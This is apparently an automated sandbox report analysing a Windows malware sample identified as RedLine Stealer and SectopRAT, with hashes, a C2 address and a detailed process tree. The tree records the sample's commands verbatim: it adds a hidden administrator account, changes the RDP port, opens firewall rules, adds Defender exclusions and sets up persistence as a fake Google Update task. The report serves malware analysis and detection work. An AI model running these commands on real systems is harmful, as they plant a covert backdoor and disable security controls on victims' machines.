Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    22/12/2024, 02:17

General

  • Target

    f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe

  • Size

    4.1MB

  • MD5

    166ad2bad1b89030246c845ef575cb09

  • SHA1

    5875242be7725edd2fc582350d352496d4da1b56

  • SHA256

    f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14

  • SHA512

    c24e79e0adbcb666ac9ba4839441f787cd10fc98a832ae2ecaaffddfa6ffd455f3121bb634e96651931d994426073084bf35685f0372d5b8794e6654640677ef

  • SSDEEP

    98304:E1E7x7WKpOEYMP8TTjPnPCDexiO75F1Nv6563Y:E1E7x7WFoEWNO1Nxo

Malware Config

Extracted

Family

redline

Botnet

ads6

C2

bhajhhsy6.fun:80

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 3 IoCs
  • Sectoprat family
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 2 TTPs 5 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs
  • Executes dropped EXE 13 IoCs
  • Loads dropped DLL 13 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 16 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe
    "C:\Users\Admin\AppData\Local\Temp\f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1628
    • C:\Windows\SysWOW64\makecab.exe
      "C:\Windows\System32\makecab.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2632
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c FHaltkaUYOvf & xkCNwAXEEDcq & BsWHxifyTEoE & cmd < Rimasta.xltx
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1908
      • C:\Windows\SysWOW64\cmd.exe
        cmd
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2788
        • C:\Windows\SysWOW64\findstr.exe
          findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2888
        • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
          Potere.exe.com A
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2932
          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
            C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com A
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2812
            • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
              C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
              6⤵
              • Executes dropped EXE
              PID:1920
        • C:\Windows\SysWOW64\findstr.exe
          findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2828
        • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com
          Riscalda.exe.com Z
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2912
          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com
            C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com Z
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2740
            • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
              C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2144
        • C:\Windows\SysWOW64\findstr.exe
          findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2832
        • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com
          Desideri.exe.com G
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2688
          • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com
            C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com G
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2092
            • C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
              C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              PID:2588
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\1172.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2312
                • C:\Windows\SysWOW64\cscript.exe
                  cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\1172.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1980
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\81.vbs" EGocAeBsIQ UceSTiIhIr "C:\Users\Admin\AppData\Roaming\ALKmVbB\531.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1164
                • C:\Windows\SysWOW64\cscript.exe
                  cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\81.vbs" EGocAeBsIQ UceSTiIhIr "C:\Users\Admin\AppData\Roaming\ALKmVbB\531.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2332
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineUA38"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1644
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineUA38"
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1712
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\321.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
                7⤵
                  PID:1944
                  • C:\Windows\SysWOW64\cscript.exe
                    cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\321.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2476
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore48"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:1280
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore48"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:1924
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ALKmVbB\FuaxiqhamB.bat EGocAeBsIQ UceSTiIhIr"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:1556
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2496
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      wmic group where sid="S-1-5-32-544" get name /value
                      9⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1796
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:1808
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      wmic group where sid="S-1-5-32-555" get name /value
                      9⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2124
                  • C:\Windows\SysWOW64\net.exe
                    net user EGocAeBsIQ UceSTiIhIr /add
                    8⤵
                      PID:2452
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 user EGocAeBsIQ UceSTiIhIr /add
                        9⤵
                        • System Location Discovery: System Language Discovery
                        PID:1844
                    • C:\Windows\SysWOW64\net.exe
                      net localgroup Administrators EGocAeBsIQ /add
                      8⤵
                        PID:2212
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 localgroup Administrators EGocAeBsIQ /add
                          9⤵
                          • System Location Discovery: System Language Discovery
                          PID:1012
                      • C:\Windows\SysWOW64\net.exe
                        net localgroup "Remote Desktop Users" EGocAeBsIQ /add
                        8⤵
                        • Remote Service Session Hijacking: RDP Hijacking
                        • System Location Discovery: System Language Discovery
                        PID:1668
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 localgroup "Remote Desktop Users" EGocAeBsIQ /add
                          9⤵
                          • Remote Service Session Hijacking: RDP Hijacking
                          • System Location Discovery: System Language Discovery
                          PID:1520
                      • C:\Windows\SysWOW64\net.exe
                        net accounts /maxpwage:unlimited
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2088
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 accounts /maxpwage:unlimited
                          9⤵
                          • System Location Discovery: System Language Discovery
                          PID:2492
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v EGocAeBsIQ /t REG_DWORD /d "00000000" /f
                        8⤵
                        • Hide Artifacts: Hidden Users
                        • System Location Discovery: System Language Discovery
                        PID:2536
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:1600
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
                        8⤵
                        • Modifies Windows Firewall
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:1604
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
                        8⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2056
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
                        8⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2080
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                        8⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2888
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
                        8⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2548
                      • C:\Windows\SysWOW64\timeout.exe
                        Timeout /t 15
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Delays execution with timeout.exe
                        PID:2796
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
                      7⤵
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2764
                      • C:\Windows\SysWOW64\fsutil.exe
                        fsutil dirty query C:
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2232
                      • C:\Windows\SysWOW64\sc.exe
                        sc queryex "TermService"
                        8⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:2216
                      • C:\Windows\SysWOW64\find.exe
                        find "STATE"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2436
                      • C:\Windows\SysWOW64\find.exe
                        find /v "RUNNING"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:3052
                      • C:\Program Files\RDP Wrapper\RDPWInst.exe
                        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                        8⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:3040
                      • C:\Program Files\RDP Wrapper\RDPWInst.exe
                        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
                        8⤵
                        • Server Software Component: Terminal Services DLL
                        • Executes dropped EXE
                        • Modifies WinLogon
                        • Drops file in Program Files directory
                        • System Location Discovery: System Language Discovery
                        PID:1752
                        • C:\Windows\system32\netsh.exe
                          netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                          9⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          PID:2424
                      • C:\Windows\SysWOW64\reg.exe
                        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:1480
                      • C:\Windows\SysWOW64\reg.exe
                        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2876
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c query session rdp-tcp
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2732
                      • C:\Program Files\RDP Wrapper\RDPWInst.exe
                        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                        8⤵
                        • Server Software Component: Terminal Services DLL
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:1280
                        • C:\Windows\system32\netsh.exe
                          netsh advfirewall firewall delete rule name="Remote Desktop"
                          9⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          PID:1748
                      • C:\Program Files\RDP Wrapper\RDPWInst.exe
                        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
                        8⤵
                        • Server Software Component: Terminal Services DLL
                        • Executes dropped EXE
                        • Modifies WinLogon
                        • Drops file in Program Files directory
                        • System Location Discovery: System Language Discovery
                        PID:1600
                        • C:\Windows\system32\netsh.exe
                          netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                          9⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          PID:2188
                      • C:\Windows\SysWOW64\reg.exe
                        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                        8⤵
                          PID:2256
                        • C:\Windows\SysWOW64\reg.exe
                          reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:2140
                        • C:\Windows\SysWOW64\reg.exe
                          reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:280
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:352
                          • C:\Windows\SysWOW64\cscript.exe
                            cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:3068
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:1328
                          • C:\Windows\SysWOW64\reg.exe
                            reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:2076
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:1356
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /c:"[6.1.7601.17514]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:1312
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\112.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\795.vbs" "VlVoV1RWQlZWa2hpTWs1Q1dsVktlbE5XUlcxUk1GWk5aRlF4VmxreVZsUldSMnhLWVVWc2VVcHNRalZpUlhSSFVsZHpPV1Y2ClFYZFBWRWt3VGxSVmVFeFVRa1ZTVkVGMENrNUVWWGhOUXpGRFRVVkdSMHhVYXpWT1ZVMTRUMFZOZDFKcVRYcE5XREE5" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:2480
                        • C:\Windows\SysWOW64\cscript.exe
                          cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\112.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\795.vbs" "VlVoV1RWQlZWa2hpTWs1Q1dsVktlbE5XUlcxUk1GWk5aRlF4VmxreVZsUldSMnhLWVVWc2VVcHNRalZpUlhSSFVsZHpPV1Y2ClFYZFBWRWt3VGxSVmVFeFVRa1ZTVkVGMENrNUVWWGhOUXpGRFRVVkdSMHhVYXpWT1ZVMTRUMFZOZDFKcVRYcE5XREE5" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:1020
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore26"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:2132
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore26"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:2440
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1 -n 30
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:2772
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k NetworkService
            1⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: LoadsDriver
            PID:2712
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {51878247-83E0-4A77-BC99-21F58D94B95F} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
            1⤵
              PID:3028
              • C:\Windows\System32\WScript.exe
                C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\795.vbs" VlVoV1RWQlZWa2hpTWs1Q1dsVktlbE5XUlcxUk1GWk5aRlF4VmxreVZsUldSMnhLWVVWc2VVcHNRalZpUlhSSFVsZHpPV1Y2ClFYZFBWRWt3VGxSVmVFeFVRa1ZTVkVGMENrNUVWWGhOUXpGRFRVVkdSMHhVYXpWT1ZVMTRUMFZOZDFKcVRYcE5XREE5
                2⤵
                • Blocklisted process makes network request
                PID:1740
              • C:\Windows\System32\WScript.exe
                C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\531.vbs" EGocAeBsIQ UceSTiIhIr "C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat"
                2⤵
                  PID:3036
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat
                    3⤵
                    • Drops file in System32 directory
                    PID:2292
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
                      4⤵
                        PID:1096
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic group where sid="S-1-5-32-544" get name /value
                          5⤵
                            PID:2460
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                          4⤵
                            PID:888
                            • C:\Windows\System32\Wbem\WMIC.exe
                              wmic group where sid="S-1-5-32-555" get name /value
                              5⤵
                                PID:2296
                            • C:\Windows\system32\net.exe
                              net user EGocAeBsIQ UceSTiIhIr /add
                              4⤵
                                PID:2536
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user EGocAeBsIQ UceSTiIhIr /add
                                  5⤵
                                    PID:2492
                                • C:\Windows\system32\net.exe
                                  net localgroup Administrators EGocAeBsIQ /add
                                  4⤵
                                    PID:1280
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 localgroup Administrators EGocAeBsIQ /add
                                      5⤵
                                        PID:1580
                                    • C:\Windows\system32\net.exe
                                      net localgroup Remote Desktop Users EGocAeBsIQ /add
                                      4⤵
                                        PID:580
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 localgroup Remote Desktop Users EGocAeBsIQ /add
                                          5⤵
                                            PID:2172
                                        • C:\Windows\system32\net.exe
                                          net accounts /maxpwage:unlimited
                                          4⤵
                                            PID:1028
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                              5⤵
                                                PID:2612
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v EGocAeBsIQ /t REG_DWORD /d "00000000" /f
                                              4⤵
                                              • Hide Artifacts: Hidden Users
                                              PID:2360
                                            • C:\Windows\system32\reg.exe
                                              reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
